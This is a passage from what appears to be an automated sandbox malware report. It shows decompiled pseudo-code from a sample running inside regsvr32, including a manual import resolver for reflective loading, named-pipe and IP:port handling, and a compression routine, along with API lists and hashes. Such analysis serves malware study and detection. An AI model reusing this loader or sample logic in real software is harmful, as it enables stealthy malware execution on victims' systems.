										_push(_t104[1] & 0x0000ffff);
										_push( *_t104 >> 0x18);
										_push(_t104[0] & 0x000000ff);
										_push(_t104[0] & 0x000000ff);
										_t110 = E0499A43D(_t203) + _t203;
										__eflags = _t110;
										E04999E12(_t110, _v184 - _t103, "%u.%u.%u.%u:%u", _v196 & 0x000000ff);
										_t159 = _v204;
										_t208 = _t208 + 0x20;
									}
									_t199 = _t199 + 1;
									_t159 = _t159 + 0x20;
									_v204 = _t159;
									__eflags = _t199 - _t146;
								} while (_t199 < _t146);
								goto L50;
							}
							__eflags = _t87 != 1;
							if(_t87 != 1) {
								goto L56;
							}
							_v204 = 0;
							_t113 = E0499171A( &_v204, _t221);
							_t204 = _v204;
							_v196 = _t113;
							__eflags = _t113;
							if(_t113 != 0) {
								E04998BF4( &_v196, _t204);
							}
							_v204 = _t204 * 0x16;
							_t84 =  &_v204;
							goto L13;
						}
						if(_t214 == 0) {
							_t84 = E049A0962( &_v200);
							L16:
							__eflags = _t84;
							if(_t84 == 0) {
								_push(0);
								_push(0);
								goto L19;
							}
							_push(_v200);
							goto L14;
						}
						_t118 = _t80 - 1;
						if(_t118 == 0) {
							_t200 = E04999B33( &(_t149[4]), 0x20, 1,  &_v176);
							_v196 = _t200;
							__eflags = _t200;
							if(_t200 == 0) {
								L30:
								_t192 =  *0x49af8bc; // 0x0
								E04999EDB( &_v164,  &(_t192[4]), 0x80);
								_push(0x84);
								_push( &_v168);
								_push(2);
								goto L31;
							}
							_t205 = _v176;
							__eflags = _t205 - 1;
							if(__eflags <= 0) {
								_t124 = E04991DD3(E04999F6F( *_t200, __eflags), 0, 0, 0);
								_t208 = _t208 + 0x10;
								_v168 = _t124;
								goto L30;
							}
							_t125 = _t205 - 1;
							_v184 = _t205 - 1;
							_t127 = E04998BDE(_t125 << 2);
							_v188 = _t127;
							__eflags = _t127;
							if(_t127 == 0) {
								goto L30;
							}
							_t148 = 1;
							__eflags = _t205 - 1;
							if(__eflags <= 0) {
								L28:
								_t129 = E04991DD3(E04999F6F( *_t200, __eflags), _t127, _v184, 0);
								_t208 = _t208 + 0x10;
								_v168 = _t129;
								E04999C2C( &_v176);
								goto L30;
							}
							_v204 = _t127;
							do {
								_t132 = E04999880( *((intOrPtr*)(_t200 + _t148 * 4)), E0499A43D( *((intOrPtr*)(_t200 + _t148 * 4))));
								_t183 = _v204;
								_t148 = _t148 + 1;
								 *_t183 = _t132;
								_v204 = _t183 + 4;
								__eflags = _t148 - _t205;
							} while (__eflags < 0);
							_t127 = _v188;
							goto L28;
						}
						_t133 = _t118 - 3;
						if(_t133 == 0) {
							_push(0);
							_push(0);
							_t196 = 5;
							E04995EC3(E0499D1A6(_t196));
							_v172 = 1;
							goto L56;
						}
						_t137 = _t133;
						if(_t137 == 0) {
							_t84 = E049A0940( &_v200);
							goto L16;
						}
						if(_t137 != 1) {
							goto L56;
						}
						E049A0940( &_v200);
						goto L12;
					}
				}
				return 0;
			}
























































                                                                                                                                                                                              0x0499377f
                                                                                                                                                                                              0x04993785
                                                                                                                                                                                              0x04993790
                                                                                                                                                                                              0x04993794
                                                                                                                                                                                              0x04993798
                                                                                                                                                                                              0x04993798
                                                                                                                                                                                              0x0499379d
                                                                                                                                                                                              0x0499379e
                                                                                                                                                                                              0x049937a4
                                                                                                                                                                                              0x049937b0
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049937c3
                                                                                                                                                                                              0x049937c8
                                                                                                                                                                                              0x049937c9
                                                                                                                                                                                              0x049937ce
                                                                                                                                                                                              0x049937d3
                                                                                                                                                                                              0x049937d9
                                                                                                                                                                                              0x049937e7
                                                                                                                                                                                              0x04993af7
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049937f8
                                                                                                                                                                                              0x049937f8
                                                                                                                                                                                              0x049937fe
                                                                                                                                                                                              0x04993801
                                                                                                                                                                                              0x04993804
                                                                                                                                                                                              0x04993976
                                                                                                                                                                                              0x04993976
                                                                                                                                                                                              0x04993979
                                                                                                                                                                                              0x04993aed
                                                                                                                                                                                              0x04993833
                                                                                                                                                                                              0x04993834
                                                                                                                                                                                              0x04993838
                                                                                                                                                                                              0x04993838
                                                                                                                                                                                              0x0499383a
                                                                                                                                                                                              0x0499383a
                                                                                                                                                                                              0x0499383b
                                                                                                                                                                                              0x0499395a
                                                                                                                                                                                              0x0499395a
                                                                                                                                                                                              0x0499395b
                                                                                                                                                                                              0x04993960
                                                                                                                                                                                              0x04993afd
                                                                                                                                                                                              0x04993b03
                                                                                                                                                                                              0x04993b0e
                                                                                                                                                                                              0x04993b10
                                                                                                                                                                                              0x04993b11
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04993b11
                                                                                                                                                                                              0x04993980
                                                                                                                                                                                              0x04993980
                                                                                                                                                                                              0x04993983
                                                                                                                                                                                              0x049939c8
                                                                                                                                                                                              0x049939cc
                                                                                                                                                                                              0x049939d1
                                                                                                                                                                                              0x049939d5
                                                                                                                                                                                              0x049939d7
                                                                                                                                                                                              0x04993ad8
                                                                                                                                                                                              0x04993ade
                                                                                                                                                                                              0x04993ae2
                                                                                                                                                                                              0x04993859
                                                                                                                                                                                              0x04993859
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04993859
                                                                                                                                                                                              0x049939dd
                                                                                                                                                                                              0x049939e1
                                                                                                                                                                                              0x049939e5
                                                                                                                                                                                              0x049939ee
                                                                                                                                                                                              0x049939f0
                                                                                                                                                                                              0x049939f5
                                                                                                                                                                                              0x049939f7
                                                                                                                                                                                              0x04993ab2
                                                                                                                                                                                              0x04993ab2
                                                                                                                                                                                              0x04993ab2
                                                                                                                                                                                              0x04993abb
                                                                                                                                                                                              0x04993abd
                                                                                                                                                                                              0x04993ac0
                                                                                                                                                                                              0x04993ac1
                                                                                                                                                                                              0x04993ac8
                                                                                                                                                                                              0x04993ace
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04993ace
                                                                                                                                                                                              0x049939fd
                                                                                                                                                                                              0x049939ff
                                                                                                                                                                                              0x04993a01
                                                                                                                                                                                              0x04993a90
                                                                                                                                                                                              0x04993a97
                                                                                                                                                                                              0x04993a98
                                                                                                                                                                                              0x04993a9b
                                                                                                                                                                                              0x04993a9c
                                                                                                                                                                                              0x04993aa8
                                                                                                                                                                                              0x04993aad
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04993aad
                                                                                                                                                                                              0x04993a0b
                                                                                                                                                                                              0x04993a0b
                                                                                                                                                                                              0x04993a0e
                                                                                                                                                                                              0x04993a12
                                                                                                                                                                                              0x04993a12
                                                                                                                                                                                              0x04993a14
                                                                                                                                                                                              0x04993a19
                                                                                                                                                                                              0x04993a1b
                                                                                                                                                                                              0x04993a1e
                                                                                                                                                                                              0x04993a24
                                                                                                                                                                                              0x04993a28
                                                                                                                                                                                              0x04993a28
                                                                                                                                                                                              0x04993a1b
                                                                                                                                                                                              0x04993a2e
                                                                                                                                                                                              0x04993a30
                                                                                                                                                                                              0x04993a34
                                                                                                                                                                                              0x04993a36
                                                                                                                                                                                              0x04993a39
                                                                                                                                                                                              0x04993a40
                                                                                                                                                                                              0x04993a49
                                                                                                                                                                                              0x04993a4f
                                                                                                                                                                                              0x04993a54
                                                                                                                                                                                              0x04993a5d
                                                                                                                                                                                              0x04993a75
                                                                                                                                                                                              0x04993a75
                                                                                                                                                                                              0x04993a78
                                                                                                                                                                                              0x04993a7d
                                                                                                                                                                                              0x04993a81
                                                                                                                                                                                              0x04993a81
                                                                                                                                                                                              0x04993a84
                                                                                                                                                                                              0x04993a85
                                                                                                                                                                                              0x04993a88
                                                                                                                                                                                              0x04993a8c
                                                                                                                                                                                              0x04993a8c
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04993a12
                                                                                                                                                                                              0x04993985
                                                                                                                                                                                              0x04993988
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04993992
                                                                                                                                                                                              0x04993996
                                                                                                                                                                                              0x0499399b
                                                                                                                                                                                              0x0499399f
                                                                                                                                                                                              0x049939a3
                                                                                                                                                                                              0x049939a5
                                                                                                                                                                                              0x049939ad
                                                                                                                                                                                              0x049939b3
                                                                                                                                                                                              0x049939b7
                                                                                                                                                                                              0x049939bb
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049939bb
                                                                                                                                                                                              0x0499380a
                                                                                                                                                                                              0x0499396c
                                                                                                                                                                                              0x0499384c
                                                                                                                                                                                              0x0499384d
                                                                                                                                                                                              0x0499384f
                                                                                                                                                                                              0x04993857
                                                                                                                                                                                              0x04993858
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04993858
                                                                                                                                                                                              0x04993851
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04993851
                                                                                                                                                                                              0x04993810
                                                                                                                                                                                              0x04993813
                                                                                                                                                                                              0x0499388f
                                                                                                                                                                                              0x04993891
                                                                                                                                                                                              0x04993897
                                                                                                                                                                                              0x04993899
                                                                                                                                                                                              0x04993936
                                                                                                                                                                                              0x04993936
                                                                                                                                                                                              0x04993948
                                                                                                                                                                                              0x0499394e
                                                                                                                                                                                              0x04993957
                                                                                                                                                                                              0x04993958
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04993958
                                                                                                                                                                                              0x0499389f
                                                                                                                                                                                              0x049938a3
                                                                                                                                                                                              0x049938a6
                                                                                                                                                                                              0x0499392a
                                                                                                                                                                                              0x0499392f
                                                                                                                                                                                              0x04993932
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04993932
                                                                                                                                                                                              0x049938a8
                                                                                                                                                                                              0x049938ab
                                                                                                                                                                                              0x049938b3
                                                                                                                                                                                              0x049938b8
                                                                                                                                                                                              0x049938bd
                                                                                                                                                                                              0x049938bf
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049938c3
                                                                                                                                                                                              0x049938c4
                                                                                                                                                                                              0x049938c6
                                                                                                                                                                                              0x049938f5
                                                                                                                                                                                              0x04993904
                                                                                                                                                                                              0x04993909
                                                                                                                                                                                              0x0499390c
                                                                                                                                                                                              0x04993918
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04993918
                                                                                                                                                                                              0x049938c8
                                                                                                                                                                                              0x049938cc
                                                                                                                                                                                              0x049938da
                                                                                                                                                                                              0x049938df
                                                                                                                                                                                              0x049938e3
                                                                                                                                                                                              0x049938e4
                                                                                                                                                                                              0x049938e9
                                                                                                                                                                                              0x049938ed
                                                                                                                                                                                              0x049938ed
                                                                                                                                                                                              0x049938f1
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049938f1
                                                                                                                                                                                              0x04993815
                                                                                                                                                                                              0x04993818
                                                                                                                                                                                              0x04993860
                                                                                                                                                                                              0x04993861
                                                                                                                                                                                              0x04993864
                                                                                                                                                                                              0x0499386c
                                                                                                                                                                                              0x04993871
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04993871
                                                                                                                                                                                              0x0499381b
                                                                                                                                                                                              0x0499381e
                                                                                                                                                                                              0x04993847
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04993847
                                                                                                                                                                                              0x04993823
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499382e
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499382e
                                                                                                                                                                                              0x049937e7
                                                                                                                                                                                              0x04993b1f

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 049937B2
                                                                                                                                                                                                • Part of subcall function 0499D1A6: FlushFileBuffers.KERNEL32(00000000,?,04993AC6,00000000,00000004), ref: 0499D1EC
                                                                                                                                                                                              • DisconnectNamedPipe.KERNEL32 ref: 04993B03
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: BuffersDisconnectErrorFileFlushLastNamedPipe
                                                                                                                                                                                              • String ID: %u.%u.%u.%u:%u
                                                                                                                                                                                              • API String ID: 465096328-3858738763
                                                                                                                                                                                              • Opcode ID: e13b225448e724352b1f3fe7fdf9ff30bfc48ffbd069ed872f6b79a65a61a0bb
                                                                                                                                                                                              • Instruction ID: 1bf4a4f61ba38c815da38ca893ed7a1ecf4601f5b4c1cdf5a95c650284232cdc
                                                                                                                                                                                              • Opcode Fuzzy Hash: e13b225448e724352b1f3fe7fdf9ff30bfc48ffbd069ed872f6b79a65a61a0bb
                                                                                                                                                                                              • Instruction Fuzzy Hash: 01A195B2508301AFEB24DF6DD885A6BB7ECEF88314F04493EF95596140DB34ED458B52
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 049A370B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151libraryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 50%
                                                                                                                                                                                              			E049A370B(signed int __eax, void* __ecx, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				void* _t163;
				void* _t167;

				_t167 = __ecx;
				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E0499EFA7(_t167, _v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_t34 = _v8 + 0xc; // 0xffff
						_v36 = LoadLibraryA( *_t34 + _a4);
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_t43 = _v8 + 0x10; // 0xb8
								_v12 =  *_t43 + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_t73 = _v8 + 0x10; // 0xb8
									_v24 =  *((intOrPtr*)( *_t73 + _a4 + _v28));
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										_t89 = _v8 + 0x10; // 0xb8
										 *( *_t89 + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}























                                                                                                                                                                                              0x049a370b
                                                                                                                                                                                              0x049a3711
                                                                                                                                                                                              0x049a3719
                                                                                                                                                                                              0x049a372e
                                                                                                                                                                                              0x049a3740
                                                                                                                                                                                              0x049a374c
                                                                                                                                                                                              0x049a3752
                                                                                                                                                                                              0x049a3757
                                                                                                                                                                                              0x049a3763
                                                                                                                                                                                              0x049a38ce
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a38ce
                                                                                                                                                                                              0x049a3769
                                                                                                                                                                                              0x049a3772
                                                                                                                                                                                              0x049a3780
                                                                                                                                                                                              0x049a3783
                                                                                                                                                                                              0x049a3792
                                                                                                                                                                                              0x049a3792
                                                                                                                                                                                              0x049a3799
                                                                                                                                                                                              0x049a37a7
                                                                                                                                                                                              0x049a37aa
                                                                                                                                                                                              0x049a37ba
                                                                                                                                                                                              0x049a37c7
                                                                                                                                                                                              0x049a37ce
                                                                                                                                                                                              0x049a37de
                                                                                                                                                                                              0x049a37f0
                                                                                                                                                                                              0x049a37f6
                                                                                                                                                                                              0x049a37e0
                                                                                                                                                                                              0x049a37e8
                                                                                                                                                                                              0x049a37e8
                                                                                                                                                                                              0x049a37f9
                                                                                                                                                                                              0x049a37fd
                                                                                                                                                                                              0x049a3809
                                                                                                                                                                                              0x049a380d
                                                                                                                                                                                              0x049a3811
                                                                                                                                                                                              0x049a3815
                                                                                                                                                                                              0x049a3821
                                                                                                                                                                                              0x049a384c
                                                                                                                                                                                              0x049a3854
                                                                                                                                                                                              0x049a385a
                                                                                                                                                                                              0x049a3866
                                                                                                                                                                                              0x049a3872
                                                                                                                                                                                              0x049a3823
                                                                                                                                                                                              0x049a3828
                                                                                                                                                                                              0x049a3833
                                                                                                                                                                                              0x049a383f
                                                                                                                                                                                              0x049a383f
                                                                                                                                                                                              0x049a387b
                                                                                                                                                                                              0x049a3881
                                                                                                                                                                                              0x049a388b
                                                                                                                                                                                              0x049a38a7
                                                                                                                                                                                              0x049a388d
                                                                                                                                                                                              0x049a3890
                                                                                                                                                                                              0x049a389c
                                                                                                                                                                                              0x049a389c
                                                                                                                                                                                              0x049a388b
                                                                                                                                                                                              0x049a38af
                                                                                                                                                                                              0x049a38b8
                                                                                                                                                                                              0x049a38b8
                                                                                                                                                                                              0x049a38c6
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a38c6
                                                                                                                                                                                              0x049a37d2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a37d2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a37aa
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 049A3728
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00000000), ref: 049A37C1
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: HandleLibraryLoadModule
                                                                                                                                                                                              • String ID: GetProcAddress$kernel32.dll
                                                                                                                                                                                              • API String ID: 4133054770-1584408056
                                                                                                                                                                                              • Opcode ID: c0fe9c514c745152e66df44165b4e0ca4020ebcb0d22424b2a90db89f9474248
                                                                                                                                                                                              • Instruction ID: 6f70bdbc7e0dfc8f4197e80d0779d18db33426c5f276b58c1ef99cb7429941be
                                                                                                                                                                                              • Opcode Fuzzy Hash: c0fe9c514c745152e66df44165b4e0ca4020ebcb0d22424b2a90db89f9474248
                                                                                                                                                                                              • Instruction Fuzzy Hash: 29619075E10209EFDB10CF98C485BADBBF1FF48315F2485A9E815AB291D734AA90DF90
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 049A4100 Relevance: 6.6, APIs: 5, Instructions: 341COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 99%
                                                                                                                                                                                              			E049A4100(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0xfed1e900
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0xa1ec8b55
					_t12 = _t272 + 0x5c; // 0xbde85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E049A7120(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E049A5E80(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0xbde85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E049A5FC0( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0xa1ec8b55
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0xa1ec8b55
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0x8341ffff
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0xa1ec8b55
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0xa1ec8b55
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0xed7505f9
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0xbde85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0x8341ffff
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0xa1ec8b55
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E049A5FC0(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0xa1ec8b55
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0xfed1e900
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
